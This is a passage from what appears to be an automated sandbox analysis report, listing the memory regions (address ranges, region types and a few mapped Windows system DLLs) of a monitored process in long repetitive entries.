0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3729 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3730 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3731 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3732 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3733 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3734 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3735 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3736 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3737 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3738 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3739 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3740 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3741 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3742 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3743 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3744 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3745 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3746 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3747 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3748 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3749 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3750 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3751 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3752 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3753 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3754 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3755 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3756 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3757 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3758 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3759 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3760 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3761 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3762 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3763 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3764 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3765 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3766 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3767 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3768 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3769 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3770 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3771 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3772 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3773 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3774 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3775 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3776 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3777 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3778 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3779 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3780 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3781 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3782 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3783 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3784 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3785 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3786 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3787 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3788 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3789 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3790 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3791 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3792 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3793 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3794 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3795 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3796 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3797 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3798 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3799 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3800 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3801 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3802 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3803 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3804 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3805 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3806 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3807 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3808 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3809 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3810 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3811 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3812 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3813 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3814 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3815 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3816 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3817 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3818 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3819 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3820 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3821 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3822 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3823 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3824 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3825 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3826 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3827 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3828 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3829 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3830 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3831 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3832 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3833 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3834 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3835 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3836 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3837 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3838 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3839 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3840 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3841 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3842 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3843 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3844 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3845 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3846 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3847 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3848 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3849 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3850 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3851 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3852 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3853 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3854 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3855 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3856 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3857 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3858 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3859 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3860 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3861 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3862 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3863 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3864 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3865 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3866 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3867 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3868 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3869 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3870 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3871 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3872 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3873 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3874 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3875 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3876 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3877 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3878 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3879 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3880 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3881 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3882 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3883 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3884 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3885 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3886 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3887 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3888 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3889 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3890 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3891 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3892 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3893 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3894 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3895 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3896 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3897 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3898 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3899 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3900 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3901 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3902 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3904 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3905 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3906 start_va = 0x510000 end_va = 0x52dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3907 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3908 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3909 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3910 start_va = 0x7ffc44940000 end_va = 0x7ffc449e2fff monitored = 0 entry_point = 0x7ffc44954810 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 3911 start_va = 0x7ffc4c680000 end_va = 0x7ffc4c8f9fff monitored = 0 entry_point = 0x7ffc4c69a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3912 start_va = 0x9a20000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 3913 start_va = 0x400000 end_va = 0x40dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3914 start_va = 0x470000 end_va = 0x476fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3915 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 3916 start_va = 0x510000 end_va = 0x516fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 3917 start_va = 0x9a20000 end_va = 0x9b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 3918 start_va = 0x9bb0000 end_va = 0x9bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 3919 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3920 start_va = 0x4320000 end_va = 0x433bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3921 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3922 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3923 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3924 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3925 start_va = 0x4320000 end_va = 0x433bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename 